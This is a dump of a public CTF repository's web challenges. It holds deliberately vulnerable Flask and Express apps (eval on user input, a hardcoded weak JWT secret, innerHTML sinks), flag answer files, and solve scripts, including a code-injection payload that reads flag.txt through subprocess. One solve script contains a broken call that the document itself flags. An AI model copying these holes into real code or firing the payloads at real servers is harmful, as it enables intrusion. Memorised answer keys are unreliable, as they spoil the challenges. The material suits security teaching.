jwt.verify(token, JWT_SECRET); 11 | if (typeof decoded !== "object" || typeof decoded.username !== "string") { 12 | return res.status(401).redirect("/login"); 13 | } 14 | req.user = { username: decoded.username }; 15 | next(); 16 | } catch { 17 | res.status(401).redirect("/login"); 18 | } 19 | }; 20 | 21 | module.exports = jwtAuth; 22 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "chal", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "start": "node index.js" 8 | }, 9 | "keywords": [], 10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "dependencies": { 13 | "cookie-parser": "^1.4.6", 14 | "ejs": "^3.1.9", 15 | "express": "^4.18.2", 16 | "jsonwebtoken": "^9.0.2", 17 | "mysql": "^2.18.1" 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/dashboard.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: Arial, sans-serif; 3 | background-color: #f9f9f9; 4 | margin: 0; 5 | padding: 0; 6 | } 7 | 8 | .container { 9 | max-width: 800px; 10 | margin: 20px auto; 11 | padding: 20px; 12 | background-color: #fff; 13 | border-radius: 8px; 14 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 15 | } 16 | 17 | h1 { 18 | color: #333; 19 | } 20 | 21 | p { 22 | margin: 10px 0; 23 | } 24 | 25 | nav ul { 26 | padding: 0; 27 | list-style-type: none; 28 | background: #007bff; 29 | padding: 10px; 30 | border-radius: 5px; 31 | margin-bottom: 20px; 32 | display: flex; 33 | } 34 | 35 | nav ul li { 36 | margin-right: 20px; 37 | } 38 | 39 | nav ul li a { 40 | color: white; 41 | text-decoration: none; 42 | } 43 | 44 | nav ul li a:hover { 45 | text-decoration: underline; 46 | } 47 | 48 | a { 49 | color: #007bff; 50 | text-decoration: none; 51 | 
} 52 | 53 | a:hover { 54 | text-decoration: underline; 55 | } 56 | 57 | .warning { 58 | color: #856404; 59 | background-color: #fff3cd; 60 | border-color: #ffeeba; 61 | padding: 0.75rem 1.25rem; 62 | margin-bottom: 1rem; 63 | border: 1px solid transparent; 64 | border-radius: 0.25rem; 65 | text-align: center; 66 | } 67 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/login.css: -------------------------------------------------------------------------------- 1 | .container { 2 | width: 100%; 3 | max-width: 400px; 4 | margin: 50px auto; 5 | padding: 20px; 6 | background-color: #f9f9f9; 7 | border-radius: 8px; 8 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 9 | } 10 | 11 | h1 { 12 | text-align: center; 13 | color: #333; 14 | } 15 | 16 | .form-group { 17 | margin-bottom: 20px; 18 | } 19 | 20 | label { 21 | display: block; 22 | margin-bottom: 5px; 23 | color: #666; 24 | } 25 | 26 | input[type="text"], 27 | input[type="password"] { 28 | width: calc(100% - 22px); 29 | padding: 10px; 30 | border: 1px solid #ddd; 31 | border-radius: 4px; 32 | box-sizing: border-box; 33 | } 34 | 35 | button { 36 | width: 100%; 37 | padding: 10px; 38 | border: none; 39 | border-radius: 4px; 40 | background-color: #007bff; 41 | color: white; 42 | cursor: pointer; 43 | } 44 | 45 | button:hover { 46 | background-color: #0056b3; 47 | } 48 | 49 | .error { 50 | color: red; 51 | text-align: center; 52 | margin-bottom: 10px; 53 | } 54 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/main.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: Arial, sans-serif; 3 | background-color: #f9f9f9; 4 | margin: 0; 5 | padding: 0; 6 | } 7 | 8 | .container { 9 | max-width: 800px; 10 | margin: 20px auto; 11 | padding: 20px; 12 | background-color: #fff; 13 | border-radius: 8px; 14 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 15 | 
} 16 | 17 | h1 { 18 | color: #333; 19 | } 20 | 21 | nav ul { 22 | padding: 0; 23 | list-style-type: none; 24 | } 25 | 26 | nav ul li { 27 | display: inline; 28 | margin-right: 20px; 29 | } 30 | 31 | a { 32 | text-decoration: none; 33 | color: #007bff; 34 | } 35 | 36 | a:hover { 37 | text-decoration: underline; 38 | } 39 | 40 | .form-group { 41 | margin-bottom: 15px; 42 | } 43 | 44 | label { 45 | display: block; 46 | margin-bottom: 5px; 47 | } 48 | 49 | input[type="text"], 50 | input[type="password"] { 51 | width: 100%; 52 | padding: 10px; 53 | border: 1px solid #ddd; 54 | border-radius: 5px; 55 | box-sizing: border-box; 56 | } 57 | 58 | button { 59 | padding: 10px 20px; 60 | background-color: #007bff; 61 | color: white; 62 | border: none; 63 | border-radius: 5px; 64 | cursor: pointer; 65 | } 66 | 67 | button:hover { 68 | background-color: #0056b3; 69 | } 70 | 71 | .error, 72 | .warning { 73 | color: red; 74 | margin: 10px 0; 75 | } 76 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/profile.css: -------------------------------------------------------------------------------- 1 | .container { 2 | max-width: 600px; 3 | margin: 20px auto; 4 | padding: 20px; 5 | border: 1px solid #ccc; 6 | border-radius: 5px; 7 | background-color: #f9f9f9; 8 | } 9 | 10 | .form-group { 11 | margin-bottom: 15px; 12 | } 13 | 14 | .form-group label { 15 | display: block; 16 | margin-bottom: 5px; 17 | } 18 | 19 | .form-group input[type="text"], 20 | .form-group input[type="password"] { 21 | width: 100%; 22 | padding: 8px; 23 | border: 1px solid #ddd; 24 | border-radius: 4px; 25 | box-sizing: border-box; 26 | } 27 | 28 | button { 29 | padding: 10px 15px; 30 | color: white; 31 | background-color: #007bff; 32 | border: none; 33 | border-radius: 5px; 34 | cursor: pointer; 35 | } 36 | 37 | button:hover { 38 | background-color: #0056b3; 39 | } 40 | 41 | .message-box { 42 | padding: 10px; 43 | margin-bottom: 20px; 44 | border: 1px 
solid transparent; 45 | border-radius: 4px; 46 | text-align: center; 47 | } 48 | 49 | .message-box.success { 50 | color: #3c763d; 51 | background-color: #dff0d8; 52 | border-color: #d6e9c6; 53 | } 54 | 55 | .message-box.error { 56 | color: #a94442; 57 | background-color: #f2dede; 58 | border-color: #ebccd1; 59 | } 60 | 61 | .warning { 62 | color: #856404; 63 | background-color: #fff3cd; 64 | border-color: #ffeeba; 65 | padding: 0.75rem 1.25rem; 66 | margin-bottom: 1rem; 67 | border: 1px solid transparent; 68 | border-radius: 0.25rem; 69 | } 70 | 71 | nav { 72 | background: #007bff; 73 | color: white; 74 | padding: 10px; 75 | border-radius: 5px; 76 | margin-bottom: 20px; 77 | } 78 | 79 | nav ul { 80 | list-style: none; 81 | padding: 0; 82 | display: flex; 83 | } 84 | 85 | nav ul li { 86 | margin-right: 20px; 87 | } 88 | 89 | nav ul li a { 90 | color: white; 91 | text-decoration: none; 92 | } 93 | 94 | nav ul li a:hover { 95 | text-decoration: underline; 96 | } -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/register.css: -------------------------------------------------------------------------------- 1 | .container { 2 | width: 100%; 3 | max-width: 400px; 4 | margin: 50px auto; 5 | padding: 20px; 6 | background-color: #f9f9f9; 7 | border-radius: 8px; 8 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 9 | } 10 | 11 | h1 { 12 | text-align: center; 13 | color: #333; 14 | } 15 | 16 | .form-group { 17 | margin-bottom: 20px; 18 | } 19 | 20 | label { 21 | display: block; 22 | margin-bottom: 5px; 23 | color: #666; 24 | } 25 | 26 | input[type="text"], 27 | input[type="password"] { 28 | width: calc(100% - 22px); 29 | padding: 10px; 30 | border: 1px solid #ddd; 31 | border-radius: 4px; 32 | box-sizing: border-box; 33 | } 34 | 35 | button { 36 | width: 100%; 37 | padding: 10px; 38 | border: none; 39 | border-radius: 4px; 40 | background-color: #28a745; 41 | color: white; 42 | cursor: pointer; 43 | } 44 | 45 | 
button:hover { 46 | background-color: #218838; 47 | } 48 | 49 | .error { 50 | color: red; 51 | text-align: center; 52 | margin-bottom: 10px; 53 | } 54 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/js/login.js: -------------------------------------------------------------------------------- 1 | document.addEventListener('DOMContentLoaded', function() { 2 | const loginForm = document.getElementById('loginForm'); 3 | const messageBox = document.getElementById('messageBox'); 4 | 5 | loginForm.addEventListener('submit', function(e) { 6 | e.preventDefault(); 7 | const data = { 8 | username: loginForm.username.value, 9 | password: loginForm.password.value 10 | }; 11 | 12 | fetch('/login', { 13 | method: 'POST', 14 | headers: { 'Content-Type': 'application/json' }, 15 | body: JSON.stringify(data) 16 | }).then(response => response.json()) 17 | .then(json => { 18 | showMessage(json.message, json.success ? 'success' : 'error'); 19 | if (json.success) { 20 | window.location.href = '/dashboard'; 21 | } 22 | }).catch(error => { 23 | showMessage('An error occurred. 
Please try again.', 'error'); 24 | }); 25 | }); 26 | 27 | function showMessage(message, type) { 28 | messageBox.textContent = message; 29 | messageBox.className = `message-box ${type}`; 30 | messageBox.style.display = 'block'; 31 | } 32 | }); 33 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/js/register.js: -------------------------------------------------------------------------------- 1 | document.addEventListener('DOMContentLoaded', function() { 2 | const registerForm = document.getElementById('registerForm'); 3 | const messageBox = document.getElementById('messageBox'); 4 | 5 | registerForm.addEventListener('submit', function(e) { 6 | e.preventDefault(); 7 | const data = { 8 | username: registerForm.username.value, 9 | password: registerForm.password.value 10 | }; 11 | 12 | fetch('/register', { 13 | method: 'POST', 14 | headers: { 'Content-Type': 'application/json' }, 15 | body: JSON.stringify(data) 16 | }).then(response => response.json()) 17 | .then(json => { 18 | showMessage(json.message, json.success ? 'success' : 'error'); 19 | if (json.success) { 20 | window.location.href = '/login'; 21 | } 22 | }).catch(error => { 23 | showMessage('An error occurred. 
Please try again.', 'error'); 24 | }); 25 | }); 26 | 27 | function showMessage(message, type) { 28 | messageBox.textContent = message; 29 | messageBox.className = `message-box ${type}`; 30 | messageBox.style.display = 'block'; 31 | } 32 | }); 33 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/utils/config.js: -------------------------------------------------------------------------------- 1 | const crypto = require("crypto"); 2 | 3 | const JWT_SECRET = 4 | process.env.JWT_SECRET || crypto.randomBytes(64).toString("hex"); 5 | 6 | const FLAG = process.env.FLAG || "uoftctf{fake_flag}"; 7 | 8 | module.exports = { 9 | JWT_SECRET, 10 | FLAG, 11 | }; 12 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/views/dashboard.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Dashboard - Jay's Bank 5 | 6 | 7 | 8 |
9 | 16 |

Welcome, <%= username %>

17 |

Your phone number: <%= phone %>

18 |

Your credit card (last 4 digits): <%= credit_card.slice(-4) %>

19 | <% if (flag) { %> 20 |

Since you're the admin, here is your flag: <%= flag %>

21 | <% } %> 22 |
23 | 24 | 25 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/views/index.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Home - Jay's Bank 5 | 6 | 7 | 8 |
9 |

Welcome to Jay's Bank

10 |

Welcome to my (work in progress) bank. Feel free to look around during our pre-alpha-alpha-alpha stage.

11 | 23 |
24 | 25 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/views/login.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Login - Jay's Bank 5 | 6 | 7 | 8 |
9 |

Login

10 | 11 |
12 |
13 | 14 | 15 |
16 |
17 | 18 | 19 |
20 | 21 |
22 |

Don't have an account? Sign up here.

23 |
24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/views/register.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Register - Jay's Bank 5 | 6 | 7 | 8 |
9 |

Register

10 | 11 |
12 |
13 | 14 | 15 | Username must be at least 10 characters long. 16 |
17 |
18 | 19 | 20 | Password must be at least 10 characters long and include at least one digit, one special character, one uppercase letter, and one lowercase letter. 21 | 22 |
23 | 24 |
25 |

Already have an account? Login here.

26 |
27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /Web/Jay's Bank/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{IiIiIiI_am_a_pro_JSON_injector_IiIiIiI} -------------------------------------------------------------------------------- /Web/My First App/README.md: -------------------------------------------------------------------------------- 1 | # My First App 2 | 3 | I'm not much of a web developer, so my friends advised me to pay for a very expensive firewall to keep my first app secure from pesky hackers. Come check it out! 4 | -------------------------------------------------------------------------------- /Web/My First App/solve/arg_err.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Web/My First App/solve/arg_err.png -------------------------------------------------------------------------------- /Web/My First App/solve/ascii_err.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Web/My First App/solve/ascii_err.png -------------------------------------------------------------------------------- /Web/My First App/solve/first_err.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Web/My First App/solve/first_err.png -------------------------------------------------------------------------------- /Web/My First App/src/.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__/ -------------------------------------------------------------------------------- /Web/My First 
App/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye 2 | 3 | RUN apt-get update && apt-get install -y --no-install-recommends \ 4 | && rm -rf /var/lib/apt/lists/* 5 | 6 | RUN useradd -m ctfuser 7 | 8 | 9 | RUN chown -R root:root /home/ctfuser 10 | RUN chmod 755 /home/ctfuser 11 | RUN chmod 555 /tmp 12 | 13 | WORKDIR /home/ctfuser/app 14 | 15 | COPY --chown=root:root app.py requirements.txt routes.py utils.py ./ 16 | COPY --chown=root:root static ./static 17 | COPY --chown=root:root templates ./templates 18 | COPY --chown=root:root flag.txt . 19 | 20 | RUN pip install --no-cache-dir -r requirements.txt 21 | 22 | USER root 23 | RUN chmod -R 555 /home/ctfuser/app && \ 24 | chmod 444 /home/ctfuser/app/flag.txt 25 | 26 | USER ctfuser 27 | 28 | EXPOSE 1337 29 | 30 | CMD ["python", "app.py"] 31 | -------------------------------------------------------------------------------- /Web/My First App/src/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask 2 | from routes import web 3 | 4 | app = Flask(__name__, template_folder='templates') 5 | app.register_blueprint(web, url_prefix='/') 6 | 7 | 8 | if __name__ == '__main__': 9 | app.run(host="0.0.0.0", port=1337, debug=False) -------------------------------------------------------------------------------- /Web/My First App/src/flag.txt: -------------------------------------------------------------------------------- 1 | uoftctf{That_firewall_salesperson_scammed_me_:(} -------------------------------------------------------------------------------- /Web/My First App/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.0 2 | PyJWT==2.8.0 3 | -------------------------------------------------------------------------------- /Web/My First App/src/static/style.css: 
-------------------------------------------------------------------------------- 1 | body, html { 2 | margin: 0; 3 | padding: 0; 4 | height: 100%; 5 | background-color: #f4f4f4; 6 | font-family: 'Arial', sans-serif; 7 | color: #333; 8 | } 9 | 10 | .container { 11 | max-width: 1200px; 12 | margin: 0 auto; 13 | padding: 20px; 14 | display: flex; 15 | justify-content: center; 16 | align-items: center; 17 | min-height: 100vh; 18 | } 19 | 20 | .form-container { 21 | background-color: #ffffff; 22 | padding: 40px; 23 | border-radius: 8px; 24 | box-shadow: 0 2px 4px rgba(0,0,0,0.1); 25 | width: 100%; 26 | max-width: 400px; 27 | } 28 | 29 | input[type="text"], 30 | input[type="submit"] { 31 | width: 100%; 32 | padding: 10px; 33 | margin: 10px 0; 34 | border: 1px solid #ddd; 35 | border-radius: 4px; 36 | box-sizing: border-box; 37 | } 38 | 39 | input[type="submit"] { 40 | background-color: #5cb85c; 41 | color: white; 42 | border-color: #4cae4c; 43 | cursor: pointer; 44 | } 45 | 46 | input[type="submit"]:hover { 47 | background-color: #449d44; 48 | } 49 | 50 | .welcome-text { 51 | text-align: center; 52 | font-size: 24px; 53 | margin-bottom: 20px; 54 | } 55 | 56 | .error-message { 57 | color: #d9534f; 58 | background-color: #f2dede; 59 | border-color: #ebccd1; 60 | padding: 10px; 61 | margin-bottom: 20px; 62 | border-radius: 4px; 63 | text-align: center; 64 | } 65 | -------------------------------------------------------------------------------- /Web/My First App/src/templates/layout.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | {{ title | default("gg ez") }} 8 | 9 | 10 | 11 | 12 |
13 | {% block content %} 14 | {% endblock %} 15 |
16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Web/My First App/src/templates/register.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |

Please choose a username

5 | {% if error %} 6 |
{{ error }}
7 | {% endif %} 8 |
9 | 10 | 11 |
12 |
13 | {% endblock %} 14 | -------------------------------------------------------------------------------- /Web/My First App/src/utils.py: -------------------------------------------------------------------------------- 1 | import jwt 2 | 3 | SECRET_KEY = 'torontobluejays' # NOTE(review): the HS256 signing key is a short, guessable string committed to source; anyone who reads or guesses it can sign a token for any username. Load a long random key from the environment or a secret store instead. 4 | 5 | def create_jwt(username): # Sign a token whose only claim is the username (HS256); no expiry claim is set. 6 | return jwt.encode({'username': username}, SECRET_KEY, algorithm='HS256') 7 | 8 | def decode_jwt(token): # Return the verified claims, or None for any token PyJWT rejects; the accepted algorithm is pinned to HS256. 9 | try: 10 | return jwt.decode(token, SECRET_KEY, algorithms=['HS256']) 11 | except jwt.InvalidTokenError: 12 | return None 13 | -------------------------------------------------------------------------------- /Web/No Code/README.md: -------------------------------------------------------------------------------- 1 | # No Code 2 | 3 | I made a web app that lets you run any code you want. Just kidding! -------------------------------------------------------------------------------- /Web/No Code/solve/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | base_url = "https://uoftctf-no-code.chals.io/" 4 | 5 | # A leading newline gets past the server's check: re.match tests only from the start of the string and, because the DOTALL flag wasn't used, '.' cannot consume the newline, so the pattern never matches 6 | 7 | res = requests.post(f"{base_url}/execute", data={"code": "\nstr(__import__('subprocess').check_output('cat flag.txt',shell=True))"}, headers={"content-type": "application/x-www-form-urlencoded"}) 8 | print(res.text) -------------------------------------------------------------------------------- /Web/No Code/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye 2 | 3 | RUN apt-get update && apt-get install -y --no-install-recommends \ 4 | && rm -rf /var/lib/apt/lists/* 5 | 6 | RUN useradd -m ctfuser 7 | 8 | 9 | RUN chown -R root:root /home/ctfuser 10 | RUN chmod 755 /home/ctfuser 11 | RUN chmod 555 /tmp 12 | 13 | WORKDIR /home/ctfuser/app 14 | 15 | COPY --chown=root:root app.py . 
16 | COPY --chown=root:root requirements.txt . 17 | COPY --chown=root:root flag.txt . 18 | 19 | RUN pip install --no-cache-dir -r requirements.txt 20 | 21 | USER root 22 | RUN chmod -R 555 /home/ctfuser/app && \ 23 | chmod 444 /home/ctfuser/app/flag.txt 24 | 25 | USER ctfuser 26 | 27 | EXPOSE 1337 28 | 29 | CMD ["python", "app.py"] 30 | -------------------------------------------------------------------------------- /Web/No Code/src/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, jsonify 2 | import re 3 | 4 | app = Flask(__name__) 5 | 6 | @app.route('/execute', methods=['POST']) 7 | def execute_code(): # POST /execute: answer 403 when the regex below matches the 'code' form field, otherwise eval() it and return the result (or the exception text) as JSON. 8 | code = request.form.get('code', '') 9 | if re.match(".*[\x20-\x7E]+.*", code): # NOTE(review): re.match tests only from the start of the string and '.' does not match a newline unless re.DOTALL is set, so input that begins with a newline is not rejected here. 10 | return jsonify({"output": "jk lmao no code"}), 403 11 | result = "" 12 | try: 13 | result = eval(code) # NOTE(review): eval() on request data is arbitrary code execution with the app's privileges; no pattern filter makes that safe, so the fix is to not evaluate client input at all. 14 | except Exception as e: 15 | result = str(e) 16 | 17 | return jsonify({"output": result}), 200 18 | 19 | if __name__ == "__main__": 20 | app.run(host="0.0.0.0", port=1337, debug=False) 21 | -------------------------------------------------------------------------------- /Web/No Code/src/flag.txt: -------------------------------------------------------------------------------- 1 | uoftctf{r3g3x_3p1c_f41L_XDDD} -------------------------------------------------------------------------------- /Web/No Code/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.0 2 | -------------------------------------------------------------------------------- /Web/The Varsity/README.md: -------------------------------------------------------------------------------- 1 | # The Varsity 2 | 3 | Come read our newspaper! Be sure to subscribe if you want access to the entire catalogue, including the latest issue. 
-------------------------------------------------------------------------------- /Web/The Varsity/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim 2 | 3 | WORKDIR /usr/src/app 4 | 5 | ENV FLAG=uoftctf{w31rd_b3h4v10r_0f_parseInt()!} 6 | 7 | COPY package*.json ./ 8 | 9 | RUN npm install 10 | 11 | COPY . . 12 | 13 | EXPOSE 3000 14 | 15 | CMD [ "node", "server.js" ] 16 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "The Varsity", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "server.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "type": "module", 13 | "dependencies": { 14 | "cookie-parser": "^1.4.6", 15 | "ejs": "^3.1.9", 16 | "express": "^4.18.2", 17 | "jsonwebtoken": "^9.0.2" 18 | }, 19 | "devDependencies": { 20 | "nodemon": "^3.0.2" 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/static/css/index.css: -------------------------------------------------------------------------------- 1 | body, html { 2 | font-family: Arial, sans-serif; 3 | margin: 0; 4 | padding: 0; 5 | display: flex; 6 | justify-content: center; 7 | align-items: center; 8 | height: 100vh; 9 | background-color: #f7f7f7; 10 | } 11 | 12 | .container { 13 | width: 80%; 14 | text-align: center; 15 | background-color: #fff; 16 | padding: 20px; 17 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 18 | margin-top: 50px; 19 | } 20 | 21 | h1 { 22 | color: #333; 23 | } 24 | 25 | #statusMessage { 26 | margin: 20px 0; 27 | color: #555; 28 | } 29 | 30 | #articleSelector { 31 | margin: 20px 0; 32 | } 33 | 34 | select { 35 | padding: 10px; 36 | margin-right: 10px; 37 | } 
38 | 39 | button { 40 | padding: 10px 20px; 41 | background-color: #0056b3; 42 | color: white; 43 | border: none; 44 | cursor: pointer; 45 | } 46 | 47 | button:hover { 48 | background-color: #004494; 49 | } 50 | 51 | #articles { 52 | border: 1px solid #ddd; 53 | padding: 20px; 54 | margin-top: 20px; 55 | } 56 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/static/css/register.css: -------------------------------------------------------------------------------- 1 | body, html { 2 | font-family: Arial, sans-serif; 3 | margin: 0; 4 | padding: 0; 5 | display: flex; 6 | justify-content: center; 7 | align-items: center; 8 | height: 100vh; 9 | background-color: #f7f7f7; 10 | } 11 | 12 | .container { 13 | display: flex; 14 | flex-direction: column; 15 | align-items: center; 16 | justify-content: center; 17 | width: 350px; 18 | border: 1px solid #ddd; 19 | padding: 20px; 20 | background-color: #fff; 21 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 22 | } 23 | 24 | h1 { 25 | text-align: center; 26 | margin-bottom: 20px; 27 | } 28 | 29 | .form-group { 30 | display: flex; 31 | flex-direction: column; 32 | align-items: flex-start; 33 | width: 100%; 34 | margin-bottom: 15px; 35 | } 36 | 37 | label, input[type=checkbox] { 38 | display: block; 39 | margin-bottom: 5px; 40 | } 41 | 42 | input[type=text], select, button { 43 | width: calc(100% - 20px); 44 | padding: 10px; 45 | border: 1px solid #ddd; 46 | margin-top: 5px; 47 | } 48 | 49 | .checkbox-group { 50 | display: flex; 51 | align-items: center; 52 | } 53 | 54 | button { 55 | width: 100%; 56 | padding: 10px; 57 | background-color: #0056b3; 58 | color: white; 59 | border: none; 60 | cursor: pointer; 61 | } 62 | 63 | button:hover { 64 | background-color: #004494; 65 | } 66 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/static/js/index.js: -------------------------------------------------------------------------------- 1 
| function requestArticle() { /* Request the selected issue from POST /article as JSON and render the returned title and content into #articles. */ 2 | const articleNum = document.getElementById("articleNum").value; 3 | const statusMessage = document.getElementById("statusMessage"); 4 | const articlesDiv = document.getElementById("articles"); 5 | 6 | fetch("/article", { 7 | method: "POST", 8 | credentials: "same-origin", 9 | headers: { 10 | "Content-Type": "application/json", 11 | }, 12 | body: JSON.stringify({ issue: articleNum }), 13 | }) 14 | .then((response) => { 15 | if (!response.ok) { /* non-2xx: the parsed JSON error body is thrown and handled by .catch() below */ 16 | return response.json().then((err) => { 17 | throw err; 18 | }); 19 | } 20 | return response.json(); 21 | }) 22 | .then((article) => { 23 | if (articlesDiv && statusMessage) { 24 | articlesDiv.innerHTML = `

${article.title}

${article.content}

`; /* NOTE(review): article.title and article.content are interpolated into innerHTML without escaping; that is safe only if the server never returns attacker-influenced text in these fields. textContent or DOM node construction avoids the question. */ 25 | statusMessage.textContent = "Enjoy reading!"; 26 | } 27 | }) 28 | .catch((error) => { 29 | if (statusMessage) { 30 | statusMessage.textContent = "Couldn't load article!"; 31 | 32 | articlesDiv.innerHTML = error.message || "Unknown error"; /* NOTE(review): error is the server's JSON error body and its message is parsed as HTML here; articlesDiv is also not null-checked on this path (only statusMessage is). textContent would be the safer sink. */ 33 | } 34 | console.error("Error:", error); 35 | }); 36 | } 37 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/static/js/register.js: -------------------------------------------------------------------------------- 1 | function toggleVoucher() { /* Show the voucher group only while the "hasVoucher" checkbox is checked. */ 2 | const voucherGroup = document.getElementById("voucherGroup"); 3 | voucherGroup.style.display = document.getElementById("hasVoucher").checked 4 | ? "block" 5 | : "none"; 6 | } 7 | 8 | document.getElementById("registrationForm").onsubmit = function (event) { /* Replace the normal form post with a JSON POST to /register carrying the username and the voucher (empty string when the box is unchecked). */ 9 | event.preventDefault(); 10 | const username = document.getElementById("username").value; 11 | const voucher = document.getElementById("hasVoucher").checked 12 | ? document.getElementById("voucher").value 13 | : ""; 14 | 15 | fetch("/register", { 16 | method: "POST", 17 | headers: { 18 | "Content-Type": "application/json", 19 | }, 20 | body: JSON.stringify({ username, voucher }), 21 | }) 22 | .then((response) => response.json()) 23 | .then((data) => { 24 | if (data.message === "Invalid voucher") { 25 | document.getElementById("feedback").textContent = data.message; 26 | } else { 27 | document.cookie = `token=${data.token};path=/`; /* NOTE(review): the token is stored from script, so the cookie cannot be HttpOnly and carries no Secure or SameSite attribute; having the server send it with Set-Cookie would allow all three. Any response other than "Invalid voucher" reaches this branch, even one without a token. */ 28 | window.location.href = "/"; 29 | } 30 | }) 31 | .catch((error) => { 32 | console.error("Error:", error); 33 | }); 34 | }; 35 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/views/register.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Register for Access 7 | 8 | 9 | 10 |
11 |

Register for The Varsity

12 |
13 |
14 | 15 | 16 |
17 |
18 | 19 | 20 |
21 | 25 |

26 | 27 |
28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /Web/The Varsity/chal/views/user.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Welcome <%= username %>! 7 | 8 | 9 | 10 |
11 |

Greetings, <%= username %>!

12 | <% if (subscription === 'premium') { %> 13 |

As a premium member, you have exclusive access to all articles, including the latest insights and analyses. Enjoy your full access!

14 | <% } else { %> 15 |

You are currently exploring as a guest. Upgrade to premium to unlock our full library, including our most recent and in-depth articles.

16 | <% } %> 17 |
18 | 19 | 24 | 25 |
26 |
27 |
28 | 29 |
30 |
31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /Web/The Varsity/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{w31rd_b3h4v10r_0f_parseInt()!} -------------------------------------------------------------------------------- /Web/The Varsity/solve/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | base_url = "http://localhost:3000" 4 | s = requests.s() # NOTE(review): the requests module exposes Session(), not s(); as written this line raises AttributeError. 5 | 6 | r = s.post( 7 | f"{base_url}/register", 8 | json={ 9 | "username": "idc", 10 | }, 11 | headers={"content-type": "application/json"}, 12 | ) 13 | 14 | r = s.post( 15 | f"{base_url}/article", 16 | json={"issue": 0.0000009}, # can also use something like "9abc". NOTE(review): JavaScript's parseInt() reads both values as 9 (a number is stringified first, giving "9e-7"); per the flag name that is the server-side flaw, though the server code is not shown on this page. Validating the value as a strict integer (e.g. Number.isInteger on the parsed JSON number) before any access check closes it. 17 | headers={"content-type": "application/json"}, 18 | ) 19 | 20 | print(r.text) 21 | -------------------------------------------------------------------------------- /Web/Voice Changer/README.md: -------------------------------------------------------------------------------- 1 | Name: Voice Changer 2 | Description: I made a cool app that changes your voice. Check it out at https://uoftctf-voice-changer.chals.io/. 
